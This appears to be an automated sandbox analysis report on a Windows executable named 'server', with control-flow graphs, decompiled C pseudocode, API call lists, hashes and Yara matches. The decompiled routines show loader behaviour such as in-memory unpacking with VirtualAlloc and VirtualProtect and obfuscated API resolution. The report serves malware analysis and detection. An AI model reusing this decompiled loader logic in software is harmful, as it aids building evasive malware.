131->110
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004D024D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction ID: 5a4eb5335b9017b72995064155e02981a5691e6df516f36f8e83627a784eeccd
                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction Fuzzy Hash: 50526974A01229DFDB64CF58C994BA8BBB1BF09304F1480DAE90DAB351DB34AE85DF15
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 146 401202-401214 call 4012e6 149 4012d5 146->149 150 40121a-40124f GetModuleHandleA GetProcAddress 146->150 151 4012dc-4012e3 149->151 152 401251-401265 GetProcAddress 150->152 153 4012cd-4012d3 call 401ba9 150->153 152->153 155 401267-40127b GetProcAddress 152->155 153->151 155->153 157 40127d-401291 GetProcAddress 155->157 157->153 158 401293-4012a7 GetProcAddress 157->158 158->153 159 4012a9-4012ba call 40110b 158->159 161 4012bf-4012c4 159->161 161->153 162 4012c6-4012cb 161->162 162->151
                C-Code - Quality: 100%
                			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				_Unknown_base(*)()* _t29;
                				_Unknown_base(*)()* _t33;
                				_Unknown_base(*)()* _t36;
                				_Unknown_base(*)()* _t39;
                				_Unknown_base(*)()* _t42;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t50;
                				intOrPtr _t56;
                
                				_t56 = E004012E6(0x20);
                				if(_t56 == 0) {
                					_v8 = 8;
                				} else {
                					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                					_v8 = 0x7f;
                					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                					 *(_t56 + 0xc) = _t29;
                					if(_t29 == 0) {
                						L8:
                						E00401BA9(_t56);
                					} else {
                						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                						 *(_t56 + 0x10) = _t33;
                						if(_t33 == 0) {
                							goto L8;
                						} else {
                							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                							 *(_t56 + 0x14) = _t36;
                							if(_t36 == 0) {
                								goto L8;
                							} else {
                								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                								 *(_t56 + 0x18) = _t39;
                								if(_t39 == 0) {
                									goto L8;
                								} else {
                									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                									 *(_t56 + 0x1c) = _t42;
                									if(_t42 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                										_t46 = E0040110B(_t56, _a12); // executed
                										_v8 = _t46;
                										if(_t46 != 0) {
                											goto L8;
                										} else {
                											 *_a16 = _t56;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}












                0x00401210
                0x00401214
                0x004012d5
                0x0040121a
                0x00401232
                0x00401241
                0x00401248
                0x0040124a
                0x0040124f
                0x004012cd
                0x004012ce
                0x00401251
                0x0040125e
                0x00401260
                0x00401265
                0x00000000
                0x00401267
                0x00401274
                0x00401276
                0x0040127b
                0x00000000
                0x0040127d
                0x0040128a
                0x0040128c
                0x00401291
                0x00000000
                0x00401293
                0x004012a0
                0x004012a2
                0x004012a7
                0x00000000
                0x004012a9
                0x004012af
                0x004012b5
                0x004012ba
                0x004012bf
                0x004012c4
                0x00000000
                0x004012c6
                0x004012c9
                0x004012c9
                0x004012c4
                0x004012a7
                0x00401291
                0x0040127b
                0x00401265
                0x0040124f
                0x004012e3

                APIs
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			_entry_() {
                				void* _t1;
                				int _t4;
                				int _t6;
                
                				_t6 = 0;
                				_t1 = HeapCreate(0, 0x400000, 0); // executed
                				 *0x404160 = _t1;
                				if(_t1 != 0) {
                					 *0x404170 = GetModuleHandleA(0);
                					GetCommandLineW(); // executed
                					_t4 = E004019F1(); // executed
                					_t6 = _t4;
                					HeapDestroy( *0x404160);
                				}
                				ExitProcess(_t6);
                			}






                0x00401de2
                0x00401deb
                0x00401df1
                0x00401df8
                0x00401e01
                0x00401e06
                0x00401e0c
                0x00401e17
                0x00401e19
                0x00401e19
                0x00401e20

                APIs
                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
                • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                • GetCommandLineW.KERNEL32 ref: 00401E06
                  • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                  • Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                  • Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                  • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                  • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                  • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                • HeapDestroy.KERNEL32 ref: 00401E19
                • ExitProcess.KERNEL32 ref: 00401E20
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                • String ID:
                • API String ID: 1863574965-0
                • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 168 4d0005-4d0038 call 4d092b call 4d003c 173 4d003a-4d0048 168->173 174 4d0057-4d0263 call 4d0e0f call 4d0d90 VirtualAlloc 168->174 173->174 187 4d028b-4d0292 174->187 188 4d0265-4d0289 call 4d0a69 174->188 190 4d02a1-4d02b0 187->190 191 4d02ce-4d03c2 VirtualProtect call 4d0cce call 4d0ce7 188->191 190->191 192 4d02b2-4d02cc 190->192 199 4d03d1-4d03e0 191->199 192->191 194 4d0294-4d029b 192->194 194->190 200 4d0439-4d04b8 VirtualFree 199->200 201 4d03e2-4d0437 call 4d0ce7 199->201 203 4d04be-4d04cd 200->203 204 4d05f4-4d05fe 200->204 201->199 208 4d04d3-4d04dd 203->208 205 4d077f-4d0789 204->205 206 4d0604-4d060d 204->206 209 4d078b-4d07a3 205->209 210 4d07a6-4d07b0 205->210 206->205 211 4d0613-4d0637 206->211 208->204 213 4d04e3-4d0505 208->213 209->210 214 4d086e-4d08f9 LoadLibraryA 210->214 215 4d07b6-4d07cb 210->215 216 4d063e-4d0648 211->216 221 4d0517-4d0520 213->221 222 4d0507-4d0515 213->222 226 4d08fb-4d0901 214->226 227 4d0902-4d091d 214->227 218 4d07d2-4d07d5 215->218 216->205 219 4d064e-4d065a 216->219 223 4d0824-4d0833 218->223 224 4d07d7-4d07e0 218->224 219->205 225 4d0660-4d066a 219->225 228 4d0526-4d0547 221->228 222->228 232 4d0839-4d083c 223->232 229 4d07e4-4d0822 224->229 230 4d07e2 224->230 231 4d067a-4d0689 225->231 226->227 233 4d054d-4d0550 228->233 229->218 230->223 234 4d068f-4d06b2 231->234 235 4d0750-4d077a 231->235 232->214 236 4d083e-4d0847 232->236 238 4d0556-4d056b 233->238 239 4d05e0-4d05ef 233->239 240 4d06ef-4d06fc 234->240 241 4d06b4-4d06ed 234->241 235->216 242 4d0849 236->242 243 4d084b-4d086c 236->243 244 4d056d 238->244 245 4d056f-4d057a 238->245 239->208 246 4d06fe-4d0748 240->246 247 4d074b 240->247 241->240 242->214 243->232 244->239 248 4d057c-4d0599 245->248 249 4d059b-4d05bb 245->249 246->247 247->231 254 4d05bd-4d05db 248->254 249->254 254->233
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004D024D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction ID: d3110b259591b1b704ce37a9fa455e56c2fe2c78ad55c55200b0f5788761ef55
                • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
                • Instruction Fuzzy Hash: 91C1ABB5D01228EFDF60CFA8D885B9DBBB5BF08304F10809AE548A7352DB359A94DF15
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 265 4014cf-401512 VirtualProtect 266 4015a6-4015ad 265->266 267 401518-40151c 265->267 267->266 268 401522-40152c 267->268 269 40154a-401554 268->269 270 40152e-401538 268->270 271 401556-401566 269->271 272 401568 269->272 273 401542-401548 270->273 274 40153a-401540 270->274 271->272 275 40156e-401581 VirtualProtect 271->275 272->275 273->275 274->275 276 401583-401589 GetLastError 275->276 277 40158c-4015a0 275->277 276->277 277->266 277->267
                C-Code - Quality: 87%
                			E004014CF(void* __eax, void* _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				long _v20;
                				int _t42;
                				long _t53;
                				intOrPtr _t56;
                				void* _t57;
                				signed int _t59;
                
                				_v12 = _v12 & 0x00000000;
                				_t56 =  *0x404180;
                				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                				_v16 =  *(__eax + 6) & 0x0000ffff;
                				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                				_v8 = _v8 & 0x00000000;
                				if(_v16 <= 0) {
                					L12:
                					return _v12;
                				} else {
                					goto L1;
                				}
                				while(1) {
                					L1:
                					_t59 = _v12;
                					if(_t59 != 0) {
                						goto L12;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						asm("bt [esi+0x24], eax");
                						if(__eflags >= 0) {
                							L8:
                							_t53 = _t56 - 0x43175abf;
                							L9:
                							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                							if(_t42 == 0) {
                								_v12 = GetLastError();
                							}
                							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                							_v8 = _v8 + 1;
                							if(_v8 < _v16) {
                								continue;
                							} else {
                								goto L12;
                							}
                						}
                						asm("bt [esi+0x24], eax");
                						_t53 = _t56 - 0x43175ac1;
                						if(__eflags >= 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					asm("bt [esi+0x24], eax");
                					if(_t59 >= 0) {
                						_t53 = _t56 - 0x43175aa3;
                					} else {
                						_t53 = _t56 - 0x43175a83;
                					}
                					goto L9;
                				}
                				goto L12;
                			}












                0x004014d9
                0x004014e6
                0x004014ec
                0x004014f8
                0x00401508
                0x0040150a
                0x00401512
                0x004015a6
                0x004015ad
                0x00000000
                0x00000000
                0x00000000
                0x00401518
                0x00401518
                0x00401518
                0x0040151c
                0x00000000
                0x00000000
                0x00401528
                0x0040152c
                0x00401550
                0x00401554
                0x00401568
                0x00401568
                0x0040156e
                0x0040157d
                0x00401581
                0x00401589
                0x00401589
                0x00401595
                0x00401597
                0x004015a0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004015a0
                0x0040155c
                0x00401560
                0x00401566
                0x00000000
                0x00000000
                0x00000000
                0x00401566
                0x00401534
                0x00401538
                0x00401542
                0x0040153a
                0x0040153a
                0x0040153a
                0x00000000
                0x00401538
                0x00000000

                APIs
                • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                • GetLastError.KERNEL32 ref: 00401583
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLast
                • String ID:
                • API String ID: 1469625949-0
                • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 278 40f577-40f590 call 410330 281 40f592-40f595 278->281 282 40f5aa-40f5ae 278->282 283 40f62b-40f62d 281->283 284 40f5b0-40f5c5 282->284 285 40f59a-40f59c 282->285 284->281 290 40f5c7-40f5ce 284->290 286 40f59e 285->286 287 40f59f-40f5a6 285->287 286->287 287->282 291 40f603-40f606 290->291 292 40f5d0-40f5dd 291->292 293 40f608-40f627 291->293 297 40f601 292->297 298 40f5df-40f5e1 292->298 296 40f629-40f62a 293->296 296->283 297->291 299 40f5e7-40f5ed 298->299 300 40f62e-40f643 299->300 301 40f5ef-40f5fc 299->301 300->296 304 40f645-40f66f 301->304 305 40f5fe 301->305 308 40f671-40f678 304->308 309 40f67a 304->309 305->297 308->309 310 40f67d-40f680 309->310 311 40f692-40f696 310->311 312 40f682-40f690 310->312 314 40f6a0-40f6af call 415408 311->314 315 40f698-40f69d 311->315 313 40f6ce-40f6d2 312->313 313->310 317 40f6d4-40f6d7 313->317 323 40f6b1-40f6b7 314->323 324 40f6c4-40f6cc 314->324 315->314 318 40f6d9-40f6dc 317->318 319 40f6de-40f6e0 317->319 318->310 318->319 321 40f6e2 319->321 322 40f6e6 319->322 321->322 325 40f6ea-40f6ed 322->325 326 40f6c3 323->326 327 40f6b9-40f6c1 323->327 324->313 328 40f700-40f701 324->328 329 40f6f3-40f6f7 325->329 330 40f7dc-40f7e3 325->330 326->324 327->326 328->322 333 40f6f9-40f6fb 329->333 334 40f6fd-40f6fe 329->334 331 40f7e5 330->331 332 40f7e8-40f7eb 330->332 331->332 333->334 335 40f703-40f706 333->335 334->329 335->330 336 40f70c-40f710 335->336 337 40f712-40f719 336->337 338 40f71b 336->338 337->338 339 40f71d-40f722 338->339 340 40f726-40f729 339->340 341 40f724-40f725 340->341 342 40f72b-40f72e 340->342 341->340 343 40f730-40f733 342->343 344 40f756-40f758 342->344 345 40f754 343->345 346 40f735-40f739 343->346 347 40f75a-40f75d 344->347 348 40f76c-40f770 344->348 345->344 349 40f747-40f751 346->349 350 40f73b-40f741 346->350 351 40f763-40f767 347->351 352 40f75f-40f762 347->352 353 40f772-40f776 348->353 354 40f7c7-40f7c9 348->354 349->345 350->349 355 40f743-40f745 350->355 351->347 356 40f769 351->356 352->351 357 40f780-40f782 353->357 358 40f778-40f77a 353->358 359 40f7d2-40f7d7 354->359 360 40f7cb-40f7cf 354->360 355->345 356->348 361 40f7c1-40f7c2 357->361 362 40f784-40f78a 357->362 358->354 363 40f77c-40f77e 358->363 359->325 360->359 361->339 364 40f78c-40f794 call 415408 362->364 365 40f7af-40f7b7 call 415408 362->365 363->354 363->357 370 40f7a3-40f7ad 364->370 371 40f796-40f7a1 364->371 372 40f7b9-40f7ba 365->372 373 40f7bc-40f7be 365->373 370->373 371->370 372->373 373->361
                APIs
                • ___initmbctable.LIBCMT ref: 0040F57F
                  • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID: ___initmbctable__setmbcp
                • String ID:
                • API String ID: 2112888233-3916222277
                • Opcode ID: a663a23ad801ce02713cf5e1b12ba87e3d353963a62f58273bf383500bc00e90
                • Instruction ID: 892bb4d5de88db13ce879400ff2ed153c75e62f2e957e321b2abc3ebcfdad590
                • Opcode Fuzzy Hash: a663a23ad801ce02713cf5e1b12ba87e3d353963a62f58273bf383500bc00e90
                • Instruction Fuzzy Hash: FC41D472808204AFEB318F24D8047577B95EB55328F24493FE445A36E1EB7E5C4AC75D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 402 40139f-4013b6 403 4013c0 402->403 404 4013b8-4013be 402->404 405 4013c6-4013f3 call 401d3c call 401882 403->405 404->405 410 4013f5-40141a lstrlenW call 4015b0 405->410 411 40144e-401450 405->411 415 401443-401447 call 4012fb 410->415 416 40141c-40142e 410->416 412 401451-401452 ExitThread 411->412 420 40144c 415->420 418 401430-40143b call 401fe6 416->418 419 40143d-40143f 416->419 418->415 419->415 420->412
                C-Code - Quality: 100%
                			E0040139F() {
                				char _v16;
                				intOrPtr _v28;
                				void _v32;
                				void* _v36;
                				intOrPtr _t15;
                				void* _t16;
                				void* _t24;
                				long _t25;
                				int _t26;
                				void* _t30;
                				intOrPtr* _t32;
                				signed int _t35;
                				intOrPtr _t38;
                
                				_t15 =  *0x404184;
                				if( *0x40416c > 5) {
                					_t16 = _t15 + 0x40513c;
                				} else {
                					_t16 = _t15 + 0x40529c;
                				}
                				E00401D3C(_t16, _t16);
                				_t35 = 6;
                				memset( &_v32, 0, _t35 << 2);
                				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
                				if(_t24 == 0) {
                					_t25 = 0xb;
                				} else {
                					_t26 = lstrlenW( *0x404178);
                					_t8 = _t26 + 2; // 0x2
                					_t11 = _t26 + _t8 + 8; // 0xa
                					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
                					if(_t30 == 0) {
                						_t32 = _v36;
                						 *_t32 = 0;
                						if( *0x404178 == 0) {
                							 *((short*)(_t32 + 4)) = 0;
                						} else {
                							L00401FE6(_t32 + 4);
                						}
                					}
                					_t25 = E004012FB(_v28); // executed
                				}
                				ExitThread(_t25);
                			}
















                0x004013a5
                0x004013b6
                0x004013c0
                0x004013b8
                0x004013b8
                0x004013b8
                0x004013c7
                0x004013d0
                0x004013d5
                0x004013ec
                0x004013f3
                0x00401450
                0x004013f5
                0x004013fb
                0x00401401
                0x0040140f
                0x00401413
                0x0040141a
                0x00401422
                0x00401426
                0x0040142e
                0x0040143f
                0x00401430
                0x00401436
                0x00401436
                0x0040142e
                0x00401447
                0x00401447
                0x00401452

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: ExitThreadlstrlen
                • String ID:
                • API String ID: 2636182767-0
                • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 423 4d0e0f-4d0e24 SetErrorMode * 2 424 4d0e2b-4d0e2c 423->424 425 4d0e26 423->425 425->424
                APIs
                • SetErrorMode.KERNEL32(00000400,?,?,004D0223,?,?), ref: 004D0E19
                • SetErrorMode.KERNEL32(00000000,?,?,004D0223,?,?), ref: 004D0E1E
                Memory Dump Source
                • Source File: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction ID: cb069858c9b6a2e2d7e13c14fd3da84f7aedd7383e250c1659108a2ed55fba54
                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                • Instruction Fuzzy Hash: DDD0123114512877D7002A94DC09BCE7B1CDF05B62F008412FB0DD9180C774994046E9
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 426 410a56-410a60 427 410a62-410a6c 426->427 428 410a7d-410a86 426->428 427->428 429 410a6e-410a7c 427->429 430 410a89-410a8e 428->430 431 410a88 428->431 432 410a90-410aa1 RtlAllocateHeap 430->432 433 410aa3-410aaa 430->433 431->430 432->433 434 410ad5-410ad7 432->434 435 410ac8-410acd 433->435 436 410aac-410ab5 433->436 435->434 438 410acf 435->438 436->430 440 410ab7-410abc 436->440 438->434 441 410ac4-410ac6 440->441 442 410abe 440->442 441->434 442->441
                APIs
                • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
                Memory Dump Source
                • Source File: 00000000.00000002.513393360.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_40f000_server.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: eb1160d9152308b899608572ea3173e73cd21aa1122e133908bf977c095a2417
                • Instruction ID: 48c493ecf814d2832a4a192a1c493fbaf484e908aede28270238663d6051e2d4
                • Opcode Fuzzy Hash: eb1160d9152308b899608572ea3173e73cd21aa1122e133908bf977c095a2417
                • Instruction Fuzzy Hash: 6C01B1322013159BEB289F25DC44BA73764EFA17A1F05852BE855DA2D0DBF898C0C788
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 37%
                			E00401D3C(void* __eax, intOrPtr _a4) {
                
                				 *0x404190 =  *0x404190 & 0x00000000;
                				_push(0);
                				_push(0x40418c);
                				_push(1);
                				_push(_a4);
                				 *0x404188 = 0xc; // executed
                				L00401682(); // executed
                				return __eax;
                			}



                0x00401d3c
                0x00401d43
                0x00401d45
                0x00401d4a
                0x00401d4c
                0x00401d50
                0x00401d5a
                0x00401d5f

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004012E6(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
                				return _t2;
                			}




                0x004012f2
                0x004012f8

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                Memory Dump Source
                • Source File: 00000000.00000002.513323075.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.513323075.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.513323075.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
                • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
                • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401BA9(void* _a4) {
                				char _t2;
                
